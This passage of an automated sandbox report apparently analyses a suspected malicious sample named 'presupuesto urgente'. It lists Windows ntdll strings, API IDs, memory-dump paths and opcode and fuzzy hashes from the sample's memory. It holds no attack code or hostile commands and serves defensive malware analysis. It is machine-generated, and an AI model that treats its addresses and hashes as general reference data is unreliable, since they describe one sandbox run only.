                                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A52ED
                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 335A5313
                                                                                                                                                      • 8, xrefs: 335A50EE
                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A52D9
                                                                                                                                                      • Address of the debug info found in the active list., xrefs: 335A52B9, 335A5305
                                                                                                                                                      • Critical section debug info address, xrefs: 335A522A, 335A5339
                                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 335A534E
                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 335A52C1
                                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A5215, 335A52A1, 335A5324
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                                      • Opcode ID: a0680a40d6412d5f563bbd3086d1175c064d7738fee434cfde0722705a433ab9
                                                                                                                                                      • Instruction ID: 97288a6bc6af5ff17e016718eb33db29d7179a49e341804e8e978f6d3546f711
                                                                                                                                                      • Opcode Fuzzy Hash: a0680a40d6412d5f563bbd3086d1175c064d7738fee434cfde0722705a433ab9
                                                                                                                                                      • Instruction Fuzzy Hash: FD81ACB0D01348BFEB20CF98E880F9EBBB9FB48715F24455AE494B7241C7B4A944CB50

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.U3
                                                                                                                                                      • API String ID: 0-648157591
                                                                                                                                                      • Opcode ID: 879813d37923430b37459eac68ad970ed407e964a1584134025e401acd35382d
                                                                                                                                                      • Instruction ID: 405243037b55b2bfd9b44936419b6ad2caca76894d85e13d7a3beee2a2706551
                                                                                                                                                      • Opcode Fuzzy Hash: 879813d37923430b37459eac68ad970ed407e964a1584134025e401acd35382d
                                                                                                                                                      • Instruction Fuzzy Hash: 08B17CB6A083419FD711CF24E440B5FBBE8AF84754F45492EF8A4D7280DB70D9488B92

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                                      • Opcode ID: a4a6375b0d8cdb1f65704d4f8c7156424100988c1417a890bc7acb1b17d635e1
                                                                                                                                                      • Instruction ID: b349d124decd8d9c97bff2b05b62274fb026d502b221d9fe9cbe90e32fda0470
                                                                                                                                                      • Opcode Fuzzy Hash: a4a6375b0d8cdb1f65704d4f8c7156424100988c1417a890bc7acb1b17d635e1
                                                                                                                                                      • Instruction Fuzzy Hash: AD51BCB59043519BD325DF18E840BABB7ECEFC4391F444A2DB9A8C3290E771D644CB92
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      • Opcode ID: 610d13afcc36e18149e9eac3e7fc270ba4e7d8625b7a4bfd487e54289250b686
                                                                                                                                                      • Instruction ID: 7573441ae33c7f4b74070b2ff19150db9b2083c54bdbe1bc200ae3d98204bb65
                                                                                                                                                      • Opcode Fuzzy Hash: 610d13afcc36e18149e9eac3e7fc270ba4e7d8625b7a4bfd487e54289250b686
                                                                                                                                                      • Instruction Fuzzy Hash: 5A910275900785EFDB02CFA8E850A9DBBF1FF89310F498659E441EBB91CB759941CB10
                                                                                                                                                      Strings
                                                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3352D06F
                                                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3352D0E6
                                                                                                                                                      • @, xrefs: 3352D24F
                                                                                                                                                      • h.U3, xrefs: 3358A5D2
                                                                                                                                                      • @, xrefs: 3352D2B3
                                                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3352D202
                                                                                                                                                      • @, xrefs: 3352D09D
                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3352D263
                                                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 3352D136
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.U3
                                                                                                                                                      • API String ID: 0-4009894377
                                                                                                                                                      • Opcode ID: 2ce607f99ee1ace9a1826a91fbbab2f8a7d8ee713dc0886cc7653d61f4f146ae
                                                                                                                                                      • Instruction ID: 1786683114e8bf5ae9c332ea478be883d6aa09f045f0ff090031433b569b77cd
                                                                                                                                                      • Opcode Fuzzy Hash: 2ce607f99ee1ace9a1826a91fbbab2f8a7d8ee713dc0886cc7653d61f4f146ae
                                                                                                                                                      • Instruction Fuzzy Hash: E4A137B19083459FE721CF20E480B9BBBE8AF84755F41492EE998D6680E774D948CF92
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3355D879
                                                                                                                                                        • Part of subcall function 33534779: RtlDebugPrintTimes.NTDLL ref: 33534817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1975516107
                                                                                                                                                      • Opcode ID: 4a36d375420aa1f8369595d69640cbf4b5eb183e298294bc731c5480a3056196
                                                                                                                                                      • Instruction ID: c82041ffd25cbac1dbbbede59619fcb3b321b283f3de5212ac7df66d26211267
                                                                                                                                                      • Opcode Fuzzy Hash: 4a36d375420aa1f8369595d69640cbf4b5eb183e298294bc731c5480a3056196
                                                                                                                                                      • Instruction Fuzzy Hash: 8C513176E04345AFFB04DFA4E48479DBBF1BF84314F65455AE802AB691D770A982CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                      • API String ID: 0-2224505338
                                                                                                                                                      • Opcode ID: 4665e12e17a6f339669287e6216bca550267d372759e43712290477c4d1f994b
                                                                                                                                                      • Instruction ID: c3def58815e95eaf3373f9085f9455c4de47a1a788853937991ab0913ccb367c
                                                                                                                                                      • Opcode Fuzzy Hash: 4665e12e17a6f339669287e6216bca550267d372759e43712290477c4d1f994b
                                                                                                                                                      • Instruction Fuzzy Hash: C5514636912345EFD701CF68F8A4E5A7BB4EF046A0F548999F401EBA92CA71D940CF50
                                                                                                                                                      Strings
                                                                                                                                                      • HandleTraces, xrefs: 335B890F
                                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 335B880F
                                                                                                                                                      • VerifierDebug, xrefs: 335B8925
                                                                                                                                                      • VerifierFlags, xrefs: 335B88D0
                                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 335B86BD
                                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 335B86E7
                                                                                                                                                      • VerifierDlls, xrefs: 335B893D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                                      • Opcode ID: 2bbef7fa053534dfac7b6c6ff31e51b0b2105ccb9d4c3a9f4565f76cd3ca906a
                                                                                                                                                      • Instruction ID: ddfe54dc5904c0ab40eb2998a907f186d353c38e76b7c91bca4711411d8588f5
                                                                                                                                                      • Opcode Fuzzy Hash: 2bbef7fa053534dfac7b6c6ff31e51b0b2105ccb9d4c3a9f4565f76cd3ca906a
                                                                                                                                                      • Instruction Fuzzy Hash: E5917B72D02391AFEF11DF24E890B2AB7F4EB80B55F861859F940EB291C7709C05CB96
                                                                                                                                                      Strings
                                                                                                                                                      • DGP3, xrefs: 33552382
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3359A7AF
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 3359A7A5
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3359A79F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DGP3$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-1177742792
                                                                                                                                                      • Opcode ID: 2bf3fba53305bed9392f3be2beb52c05f39cff3b14baf88c009cd987e18f50c2
                                                                                                                                                      • Instruction ID: 5f5cc51f177c0d2548ed421f01457af20866286ebabae59b7c10f187ddd2d9e1
                                                                                                                                                      • Opcode Fuzzy Hash: 2bf3fba53305bed9392f3be2beb52c05f39cff3b14baf88c009cd987e18f50c2
                                                                                                                                                      • Instruction Fuzzy Hash: F631E775A00200BFF710AF59E885A9977F5EBD0B50F260459E801FB655DBB45942CB60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-523794902
                                                                                                                                                      • Opcode ID: 5cfd07a918b75144a1e8d7fa603829a066ef42dffbbadc3934a828843249771f
                                                                                                                                                      • Instruction ID: 18c70ee1df785164c51e102b2e56b6a22d024f00a7e1f82ec48c61459f77cb94
                                                                                                                                                      • Opcode Fuzzy Hash: 5cfd07a918b75144a1e8d7fa603829a066ef42dffbbadc3934a828843249771f
                                                                                                                                                      • Instruction Fuzzy Hash: ED42E0766087819FD305CF28E880B2ABBF5FF88744F884A6DE485CB691DB34D941CB52
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.U3
                                                                                                                                                      • API String ID: 0-4262189537
                                                                                                                                                      • Opcode ID: cd6a3e6ed06f1657cb7bb4f3abdae4a75d44a46d64d473c807fce819b3c881f7
                                                                                                                                                      • Instruction ID: 37296b9b02136e76c5d9e2f1d7a120396288bfbd841f772e34150b88fa6aaf53
                                                                                                                                                      • Opcode Fuzzy Hash: cd6a3e6ed06f1657cb7bb4f3abdae4a75d44a46d64d473c807fce819b3c881f7
                                                                                                                                                      • Instruction Fuzzy Hash: 5FF15EB6D01218EFEB05CF95E940EDEBBBCFF48650F55446AE502A7610EB74AE01CB90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                      • API String ID: 0-122214566
                                                                                                                                                      • Opcode ID: 4e8b303b04b78dad1875a7f8652b28e29fab17627590349bb30e05af48557f8a
                                                                                                                                                      • Instruction ID: 05f0a6bb2e6a9c5ff8d4f030da8bb48c924834f727e7378b689ac784dad8a720
                                                                                                                                                      • Opcode Fuzzy Hash: 4e8b303b04b78dad1875a7f8652b28e29fab17627590349bb30e05af48557f8a
                                                                                                                                                      • Instruction Fuzzy Hash: 9CC15875E04355ABEF0C8B64E890BBE77B5EF85340F994469E882EB290EB74D944C390
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                                      • Opcode ID: 760a68a5562fb703fcda71c46dd230dd668cf6d20e10bf41950529ec78c8e6ce
                                                                                                                                                      • Instruction ID: 6015f7b0942025a5f98ac567995fb79c7ac669990a9f647a3b71643bb01d944b
                                                                                                                                                      • Opcode Fuzzy Hash: 760a68a5562fb703fcda71c46dd230dd668cf6d20e10bf41950529ec78c8e6ce
                                                                                                                                                      • Instruction Fuzzy Hash: 159157B0E02354AFEB25DF58F844B5D7BB4FB90B58F550529E900AF681DBB09842EB90
                                                                                                                                                      Strings
                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 335A7F7B
                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 335A7FF0
                                                                                                                                                      • LdrpInitializeProcess, xrefs: 3356C5E4
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3356C5E3
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 335A7F8C, 335A8000
                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 335A7F82, 335A7FF6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                      • Opcode ID: d038b6e7dca1e9544d3943c6336c8999f1d695fed39deba0b4cef8e95b4fde61
                                                                                                                                                      • Instruction ID: cc4100c2ad3d9b8dff734b8fae4f65bac426a95436baf66b606e7ffdc59825c1
                                                                                                                                                      • Opcode Fuzzy Hash: d038b6e7dca1e9544d3943c6336c8999f1d695fed39deba0b4cef8e95b4fde61
                                                                                                                                                      • Instruction Fuzzy Hash: 3F3122B1A05301AFD314EF28F855E1ABBE4EFD4A50F410858F895AB391E620EC04CBA2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 1a12a3a49977a9bce89a84325ce28cff05de5c3e7101e44835a82626b263c02e
                                                                                                                                                      • Instruction ID: 339a36201152c44278316d0a60ec70fb3f8dfb51dba6e372b0031377dbb94ebb
                                                                                                                                                      • Opcode Fuzzy Hash: 1a12a3a49977a9bce89a84325ce28cff05de5c3e7101e44835a82626b263c02e
                                                                                                                                                      • Instruction Fuzzy Hash: A7F1BF75A00706DFEB08CF68E984BAAB7F5FF84340F2445A8E4459B781D734E981CB91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 579f31fd4779e2e658283b97a394df3c800df205a4e725379e4f4a00760059cc
                                                                                                                                                      • Instruction ID: 80a196f94fcf7b3c6945e86a868b0fab56a4354578a65fa43f75d70daa504e84
                                                                                                                                                      • Opcode Fuzzy Hash: 579f31fd4779e2e658283b97a394df3c800df205a4e725379e4f4a00760059cc
                                                                                                                                                      • Instruction Fuzzy Hash: 9051F271A017019FF714DF28E884B1977F5BBC5620F580A6EF45297A91EB78B811CB82
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 335A80F3
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 335A80E2
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 335A80E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: ae6fb28bdea9eeccd131554edc57e5c6a3063fb88886b6e4cd0287855c266cca
                                                                                                                                                      • Instruction ID: 2b406fd305b31881f92b4374c24918369d101c52ebc1b9ea9774abda934e8436
                                                                                                                                                      • Opcode Fuzzy Hash: ae6fb28bdea9eeccd131554edc57e5c6a3063fb88886b6e4cd0287855c266cca
                                                                                                                                                      • Instruction Fuzzy Hash: 9841F0B5911300AFDB11EB68EC40B4B7BF8FF84A54F41182AB858E7290EB70D8118B96
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 335B450F
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 335B4508
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 335B4519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 84f2c6aa359921defe339c119c2c88d10dc25ac9f272fa689a01e30b184a2bb1
                                                                                                                                                      • Instruction ID: 4da570c451bd42d4415e3f7566700edcf8e1d346c104daea7d04fa088ed075db
                                                                                                                                                      • Opcode Fuzzy Hash: 84f2c6aa359921defe339c119c2c88d10dc25ac9f272fa689a01e30b184a2bb1
                                                                                                                                                      • Instruction Fuzzy Hash: E841E6B66057119FDF20CF58E540A1677F4FF88792F0A0A59EC98D7256D731D8A0CB81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
